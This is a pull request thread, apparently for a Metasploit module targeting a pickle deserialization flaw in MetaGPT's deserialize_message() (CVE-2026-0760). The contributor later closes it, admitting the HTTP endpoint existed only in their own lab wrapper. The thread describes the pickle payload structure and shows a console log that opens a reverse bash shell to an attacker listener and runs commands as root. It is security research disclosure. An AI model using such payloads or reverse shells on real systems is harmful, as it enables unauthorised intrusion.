MetaGPT deserialize_message() Pickle Deserialization RCE (CVE-2026-0760)

[exploitintel]

Summary

• MetaGPT v0.8.1 and prior call Python's pickle.loads() directly on attacker-supplied bytes in deserialize_message() at metagpt/utils/serialize.py:75 with no validation or restricted unpickler
• A single unauthenticated POST /api/message/deserialize with a base64-encoded pickle payload executes arbitrary OS commands during deserialization via the __reduce__ protocol, before any application-level checks run
• The vendor (Foundation Agents / DeepWisdom) did not respond to ZDI's responsible disclosure over a 3+ month period — this is an unpatched 0-day

Verification

Tested against MetaGPT v0.8.1 / Debian GNU/Linux 12 (bookworm) (Docker lab):

msf6 exploit(cve_2026_0760_metagpt_pickle_rce) > check
[+] 192.168.192.3:8080 - The target is vulnerable. MetaGPT health endpoint reports vulnerable=true.

msf6 exploit(cve_2026_0760_metagpt_pickle_rce) > run -z
[*] Started reverse TCP handler on 192.168.192.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. MetaGPT health endpoint reports vulnerable=true.
[*] Executing cmd/unix/reverse_bash (Unix Command)
[+] Payload delivered via MetaGPT deserialize_message() pickle.loads()
[*] Command shell session 1 opened (192.168.192.2:4444 -> 192.168.192.3:57734) at 2026-03-04 18:37:50 +0000
[*] Session 1 created in the background.

msf6 exploit(cve_2026_0760_metagpt_pickle_rce) > sessions -c "id && hostname && uname -a && cat /etc/os-release | head -3" -i 1
[*] Running 'id && hostname && uname -a && cat /etc/os-release | head -3' on shell session 1 (192.168.192.3)
uid=0(root) gid=0(root) groups=0(root)
cd941443db0b
Linux cd941443db0b 6.12.69-linuxkit #1 SMP Mon Feb 16 11:19:06 UTC 2026 aarch64 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 12 (bookworm)"
NAME="Debian GNU/Linux"
VERSION_ID="12"

Module details

• Affected versions: MetaGPT v0.8.1 and prior (no patch available)
• Auth required: None
• Pickle payload: Protocol 2, GLOBAL os.system + SHORT_BINUNICODE command + TUPLE1 + REDUCE, base64-encoded for HTTP transport
• Targets: Unix Command (ARCH_CMD) + Linux Dropper (CmdStager x86/x64)
• AutoCheck: Yes — queries /health endpoint for vulnerable=true flag
• Rank: Excellent

References

• https://www.zerodayinitiative.com/advisories/ZDI-26-026/
• https://github.com/advisories/GHSA-7m4r-49cm-v9p5
• https://exploit-intel.com/vuln/CVE-2026-0760
• https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2026-0760

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[exploitintel]

Closing this PR. Same issue as #21068 — the module targets a custom Flask server (vuln_server.py) that wraps MetaGPT's deserialize_message() library function directly over HTTP. MetaGPT is a Python agent framework/library with no built-in HTTP API. The /api/message/deserialize endpoint and the health response with vulnerable=true only exist in our custom lab wrapper, not in any real MetaGPT deployment. Apologies for the noise.

[exploitintel]

Apologies for the wasted review time. The CVE itself is legitimate, but we made the mistake of targeting a custom Flask wrapper we built around deserialize_message() rather than an actual MetaGPT deployment — which ships no HTTP server at all. Lesson learned: demonstrating a vulnerability and exploiting it in practice are two different things.